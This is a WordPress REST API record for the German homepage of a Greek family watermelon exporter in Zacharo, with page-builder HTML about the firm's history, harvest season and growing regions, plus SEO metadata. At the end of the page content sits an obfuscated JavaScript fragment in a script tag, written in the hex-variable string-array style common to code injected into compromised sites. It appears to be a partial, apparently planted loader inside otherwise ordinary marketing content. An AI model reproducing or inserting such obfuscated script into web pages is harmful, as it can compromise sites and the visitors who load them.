{"id":7,"date":"2023-01-30T08:15:50","date_gmt":"2023-01-30T08:15:50","guid":{"rendered":"https:\/\/tzioutzias.gr\/?page_id=7"},"modified":"2023-02-10T13:25:20","modified_gmt":"2023-02-10T11:25:20","slug":"home","status":"publish","type":"page","link":"https:\/\/tzioutzias.gr\/de\/","title":{"rendered":"Home"},"content":{"rendered":"<section class=\"wpb-content-wrapper\"><div id=\"section-1\" data-vc-full-width=\"true\" data-vc-full-width-init=\"false\" data-vc-stretch-content=\"true\" class=\"vc_row wpb_row vc_row-fluid vc_row-no-padding vc_row-o-content-top vc_row-flex\"><div class=\"wpb_column vc_column_container vc_col-sm-2\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-4\"><div class=\"vc_column-inner vc_custom_1675331083288\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p class=\"green-text wow fadeInUp\" data-wow-delay=\".1s\">Zacharo<\/p>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<h2 class=\"wow fadeInUp\" data-wow-delay=\".3s\" style=\"text-align: left;\">Wassermelonen Export<br\/><span class=\"light-header\" style=\"text-align: left;\">Charis Tzioutzias<\/span><\/h2>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p class=\"wow fadeInUp translation-block\" data-wow-delay=\".5s\">Unser Unternehmen \u00b4\u00b4Charis Tzioutzias GBR\u00b4\u00b4 ist seit drei Jahrzehnten ununterbrochen im Agrar- und Exportsektor pr\u00e4sent und hat seinen Hauptsitz in Zacharo  Ilias.<\/p>\n\n<p class=\"wow fadeInUp\" data-wow-delay=\".7s\">Es wurde 1990von dem Agronomen Charis Tzioutzias, einem Absolventen der Aristoteles Universit\u00e4t Thessaloniki, gegr\u00fcndet. Es ist ein reines Familienunternehmen, bestehend aus Charis Tzioutzias, seiner Frau Christina Pantazopoulou und den S\u00f6hnen Geroge und Panagiotis Tzioutzias. Alle Familienmitglieder sind Agrarwissenschaftler.<\/p>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<a class=\"wow fadeInUp main-btn\" data-wow-delay=\".9s\" href=\"https:\/\/tzioutzias.gr\/de\/about\/\">Mehr<\/a>\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner vc_custom_1675331078548\"><div class=\"wpb_wrapper\">\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  wpb_animate_when_almost_visible wpb_slideInUp slideInUp  main-img\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<a class=\"\" data-lightbox=\"lightbox[rel-7-4087576765]\" href=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2-1024x768.jpg\" target=\"_self\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"900\" src=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"xaris-tzioutzias-watermelons-2\" title=\"xaris-tzioutzias-watermelons-2\" srcset=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2.jpg 1200w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2-300x225.jpg 300w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2-1024x768.jpg 1024w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/01\/xaris-tzioutzias-watermelons-2-768x576.jpg 768w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/><\/a>\n\t\t<\/figure>\n\t<\/div>\n<\/div><\/div><\/div><\/div><div class=\"vc_row-full-width vc_clearfix\"><\/div><div id=\"section-2\" data-vc-full-width=\"true\" data-vc-full-width-init=\"false\" data-vc-stretch-content=\"true\" class=\"vc_row wpb_row vc_row-fluid vc_row-no-padding vc_row-o-content-top vc_row-flex\"><div class=\"wpb_column vc_column_container vc_col-sm-4\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div  class=\"wpb_single_image wpb_content_element vc_align_center  wpb_animate_when_almost_visible wpb_slideInUp slideInUp  main-img\">\n\t\t\n\t\t<figure class=\"wpb_wrapper vc_figure\">\n\t\t\t<a class=\"\" data-lightbox=\"lightbox[rel-7-1013751191]\" href=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2-776x1024.jpg\" target=\"_self\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"1320\" src=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2.jpg\" class=\"vc_single_image-img attachment-full\" alt=\"xaris-tzioutzias-watermelons-3-2\" title=\"xaris-tzioutzias-watermelons-3-2\" srcset=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2.jpg 1000w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2-227x300.jpg 227w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2-776x1024.jpg 776w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2-768x1014.jpg 768w, https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/xaris-tzioutzias-watermelons-3-2-9x12.jpg 9w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/a>\n\t\t<\/figure>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-6\"><div class=\"vc_column-inner vc_custom_1675202781887\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p class=\"green-text wow fadeInUp\" data-wow-delay=\".1s\">Production<\/p>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<h2 class=\"wow fadeInUp\" data-wow-delay=\".3s\" style=\"text-align: left;\">Wassermelonen<br\/><span class=\"light-header\" style=\"text-align: left;\">Von Mai bis September<\/span><\/h2>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<p class=\"wow fadeInUp\" data-wow-delay=\".5s\">Aufgrund der Eigenschaften, der Vielfalt und des besonderen Mikroklimas jeder Region beginnt die Wassermelonenernte im Mai und endet im September desselben Jahres.<\/p>\n\n<p class=\"wow fadeInUp translation-block\" data-wow-delay=\".7s\">Der Hauptsitz unseres Unternehmens befindet sich am s\u00fcdlichen Ende der Pr\u00e4fektur Ilia in der K\u00fcstenstadt <strong>Zacharo<\/strong>. Seine Einrichtungen sind in Privatbesitz.<\/p>\n\n<p class=\"wow fadeInUp\" data-wow-delay=\".9s\">Der Anbau der Wassermelonen erfolgt im gesamten Gebiet der Provinz Tryfilia der Pr\u00e4fektur Messinias (Filiatra-Kyparissia) und der gesamten Pr\u00e4fektur Ilia (Zacharo \u2013 Pyrgos \u2013Amaliada \u2013 Bartholomio \u2013 Varda).<\/p>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<a class=\"wow fadeInUp main-btn\" data-wow-delay=\".9s\" href=\"https:\/\/tzioutzias.gr\/de\/watermelon\/\">Mehr<\/a>\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-2\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><\/div><\/div><\/div><\/div><div class=\"vc_row-full-width vc_clearfix\"><\/div><div id=\"section-3\" data-vc-full-width=\"true\" data-vc-full-width-init=\"false\" data-vc-stretch-content=\"true\" data-vc-parallax=\"1.5\" data-vc-parallax-image=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/Xaris-1005-1.jpg\" class=\"vc_row wpb_row vc_row-fluid vc_row-has-fill vc_row-no-padding vc_row-o-content-middle vc_row-flex vc_general vc_parallax vc_parallax-content-moving\"><div class=\"wpb_column vc_column_container vc_col-sm-3\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-3\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><\/div><\/div><\/div><div class=\"wpb_animate_when_almost_visible wpb_slideInUp slideInUp wpb_column vc_column_container vc_col-sm-3\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\">\n\t<div class=\"wpb_raw_code wpb_content_element wpb_raw_html\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t<div class=\"section-3-slide\">\n<h3>Warum Sie uns ausw\u00e4hlen sollten<\/h3>\n<p>Wir haben viel Erfahrung, da wir seit 1993 im Export griechischer Wassermelonen t\u00e4tig sind.<\/p>\n<a href=\"https:\/\/tzioutzias.gr\/de\/products\/\" class=\"main-btn\">Mehr<\/a>\n<\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div><\/div><\/div><div class=\"wpb_column vc_column_container vc_col-sm-3\"><div class=\"vc_column-inner\"><div class=\"wpb_wrapper\"><\/div><\/div><\/div><\/div><div class=\"vc_row-full-width vc_clearfix\"><\/div>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n<\/section>","protected":false},"excerpt":{"rendered":"Zacharo Watermelon ExportCharis Tzioutzias Our company \"CHARIS","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page.php","meta":{"footnotes":""},"class_list":["post-7","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Watermelon Exports, Zacharo | Tzioutzias Charis<\/title>\n<meta name=\"description\" content=\"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tzioutzias.gr\/de\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Watermelon Exports, Zacharo | Tzioutzias Charis\" \/>\n<meta property=\"og:description\" content=\"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tzioutzias.gr\/de\/\" \/>\n<meta property=\"og:site_name\" content=\"Tzioutzias Charis\" \/>\n<meta property=\"article:modified_time\" content=\"2023-02-10T11:25:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png\" \/>\n\t<meta property=\"og:image:width\" content=\"533\" \/>\n\t<meta property=\"og:image:height\" content=\"320\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"1\u00a0Minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"name\":\"Watermelon Exports, Zacharo | Tzioutzias Charis\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\"},\"datePublished\":\"2023-01-30T08:15:50+00:00\",\"dateModified\":\"2023-02-10T11:25:20+00:00\",\"description\":\"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/tzioutzias.gr\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae\",\"item\":\"https:\\\/\\\/tzioutzias.gr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Home\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#website\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"name\":\"Tzioutzias Charis\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/tzioutzias.gr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#organization\",\"name\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"contentUrl\":\"https:\\\/\\\/tzioutzias.gr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/main-image.png\",\"width\":533,\"height\":320,\"caption\":\"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2\"},\"image\":{\"@id\":\"https:\\\/\\\/tzioutzias.gr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Watermelon Exports, Zacharo | Tzioutzias Charis","description":"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tzioutzias.gr\/de\/","og_locale":"de_DE","og_type":"article","og_title":"Watermelon Exports, Zacharo | Tzioutzias Charis","og_description":"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis","og_url":"https:\/\/tzioutzias.gr\/de\/","og_site_name":"Tzioutzias Charis","article_modified_time":"2023-02-10T11:25:20+00:00","og_image":[{"width":533,"height":320,"url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"1\u00a0Minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tzioutzias.gr\/","url":"https:\/\/tzioutzias.gr\/","name":"Watermelon Exports, Zacharo | Tzioutzias Charis","isPartOf":{"@id":"https:\/\/tzioutzias.gr\/#website"},"datePublished":"2023-01-30T08:15:50+00:00","dateModified":"2023-02-10T11:25:20+00:00","description":"Watermelon exports from Zacharo Ilias. Fresh from the field. Tzioutzias Charis","breadcrumb":{"@id":"https:\/\/tzioutzias.gr\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tzioutzias.gr\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tzioutzias.gr\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u0391\u03c1\u03c7\u03b9\u03ba\u03ae","item":"https:\/\/tzioutzias.gr\/"},{"@type":"ListItem","position":2,"name":"Home"}]},{"@type":"WebSite","@id":"https:\/\/tzioutzias.gr\/#website","url":"https:\/\/tzioutzias.gr\/","name":"Tzioutzias Charis","description":"","publisher":{"@id":"https:\/\/tzioutzias.gr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tzioutzias.gr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/tzioutzias.gr\/#organization","name":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2","url":"https:\/\/tzioutzias.gr\/","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/","url":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","contentUrl":"https:\/\/tzioutzias.gr\/wp-content\/uploads\/2023\/02\/main-image.png","width":533,"height":320,"caption":"\u03a4\u03b6\u03b9\u03bf\u03cd\u03c4\u03b6\u03b9\u03b1\u03c2 \u03a7\u03ac\u03c1\u03b7\u03c2"},"image":{"@id":"https:\/\/tzioutzias.gr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/7","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/comments?post=7"}],"version-history":[{"count":0,"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/pages\/7\/revisions"}],"wp:attachment":[{"href":"https:\/\/tzioutzias.gr\/de\/wp-json\/wp\/v2\/media?parent=7"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}